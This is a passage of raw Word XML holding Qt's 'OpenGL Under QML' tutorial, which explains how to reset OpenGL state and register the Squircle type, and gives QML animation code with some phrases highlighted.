          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="009114F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disable the attributes we used</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> so that the </w:t>
      </w:r>
      <w:r w:rsidRPr="009114F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenGL context is in a "clean" state for the scene graph to pick it up</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0035792D" w:rsidRPr="009114F9" w:rsidRDefault="0035792D" w:rsidP="0035792D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009114F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="009114F9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If tracking the changes in the OpenGL context's state is not feasible, one can use the function</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2184" w:anchor="resetOpenGLState" w:history="1">
        <w:r w:rsidRPr="009114F9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF0000"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::resetOpenGLState</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009114F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) which will reset all </w:t>
      </w:r>
      <w:r w:rsidRPr="009114F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>state that the scene graph relies on</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009114F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009114F9" w:rsidRPr="009114F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu concept of state.</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> argc</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char</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argv</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QGuiApplication</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> app</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argc</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argv</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qmlRegisterType</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>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&gt;(</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"OpenGLUnderQML"</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"Squircle"</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QQuickView</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> view</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view</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setResizeMode</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QQuickView</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SizeRootObjectToView</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view</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setSource</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QUrl</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"qrc:///scenegraph/openglunderqml/main.qml"</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view</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show</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return</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> app</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exec</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35792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The application's</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>main()</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function instantiates a</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2185" w:history="1">
        <w:r w:rsidRPr="0035792D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and launches the</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>main.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file. The only thing worth noting is that we export the</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Squircle</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class to QML using the</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2186" w:anchor="qmlRegisterType" w:history="1">
        <w:r w:rsidRPr="0035792D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmlRegisterType</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() macro.</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import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QtQuick</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2.0</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import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OpenGLUnderQML</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1.0</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item</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width</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320</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height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480</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Squircle</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SequentialAnimation</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on t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NumberAnimation</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to</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duration</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2500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easing</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type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Easing</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InQuad</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NumberAnimation</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to</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duration</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2500</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easing</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type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Easing</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OutQuad</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loops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Animation</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Infinite</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running</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</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ln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We import the Squircle QML type with the name we registered in the</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>main()</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function. We then instantiate it and create a running</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2187" w:history="1">
        <w:r w:rsidRPr="0035792D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>NumberAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on its</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0035792D" w:rsidRPr="00CF3A01"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CF3A01">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3A01">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color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Qt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rgba</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0.7</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radius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10</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border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width</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1</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border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color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"white"</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anchors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fill</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label</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anchors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margins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r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10</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Text</w:t>
      </w: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id</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label</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color</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"black"</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wrapMode</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0035792D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WordWrap</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text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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"The background here is a squircle rendered with raw OpenGL using the 'beforeRender()' signal in QQuickWindow. This text label and its border is rendered using QML"</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anchors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right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parent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right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anchors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left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parent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left</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anchors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bottom</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parent</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bottom</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anchors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margins</w:t>
      </w:r>
